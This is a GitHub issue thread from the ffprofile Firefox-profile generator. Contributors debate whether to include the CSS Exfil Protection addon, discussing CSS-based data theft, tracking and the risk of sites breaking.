search

allo- / ffprofile

A tool to create firefox profiles with personalized defaults.
GNU Affero General Public License v3.0
785 stars 56 forks source link

Privacy concerned addon #235

Open CompuRoot opened 3 years ago

CompuRoot commented 3 years ago

I believe that proposed here plugin isn't from series of "cool", but in the same category as uMatrix & uBlock origin, so my proposal is to add: CSS Exfil Protection (CSS Exfil Protection - in Firefox add-ons stor)

allo- commented 3 years ago

I think the addon could fit the security category. I am not sure what websites it breaks, probably, for example, websites that style an input element depending on the validity of the data the user entered.

But what is the actual problem? As far as I see, the website owner can extract data, the user entered on his website. With Javascript activated he can do this at any time. Without Javascript this may be impossible, but still both the form and the target site from which the images are loaded need to be created by the attacker himself.

The only threat I currently can think of is extracting accidentally pasted content or sensitive data the user enters into the form and removes it again when Javascript is disabled.

The most similar issue I can think of is leaking the Browser's window size using media queries. And this is an issue, because it leaks external data (resolution, panel size, browser toolbar sizes) and not data the user voluntary enters into the website.

Do I overlook something?

CompuRoot commented 3 years ago

Without Javascript this may be impossible, but still both the form and the target site from which the images are loaded need to be created by the attacker himself.

That's not only about user data supplied in forms, it is also about tracking by using only CSS. Take a look at this research: https://github.com/jbtronics/CrookedStyleSheets Even without JavaScript, CSS can do a lot of tracking and plugin I suggested mitigate such behaviors according to its author.

As about tests, I used it on multiple computers in many organizations and didn't experienced yet that CSS Exfil Protection broke something online. uMatrix & Ublock origin actually creates much more problems on outdated , or badly written websites.

allo- commented 3 years ago

When it works as intended, a side-effect would be, that it prevents something like

input:valid {
  background: url(valid.png);
}

Wouldn't it? Of course it breaks less than uMatrix when you don't want to unblock a lot of things first. The worry is about breakage that is unexpected and hard to tell which addon/setting is causing it. Why I am a bit careful with good descriptions and concise settings (in contrast to the large user.js files you can find everywhere), is that the generator should be as transparent as possible what you configure and which setting may be the one that breaks a feature to improve privacy.

Your second link looks indeed like there is quite a bit of tracking potential. Is somewhere an explanation, what the addon actually does to prevent this? Your new link suggest that all images should be preloaded, but the description reads like the addon modifies the CSS instead.

CompuRoot commented 3 years ago

When it works as intended, a side-effect would be, that it prevents something like

input:valid { background: url(valid.png); }

Wouldn't it?

No, addon is smart enough to figure out that's external call or local.

Is somewhere an explanation, what the addon actually does to prevent this?

Here is official home of suggested addon: https://github.com/mlgualtieri/CSS-Exfil-Protection And here is description - what it doing: https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense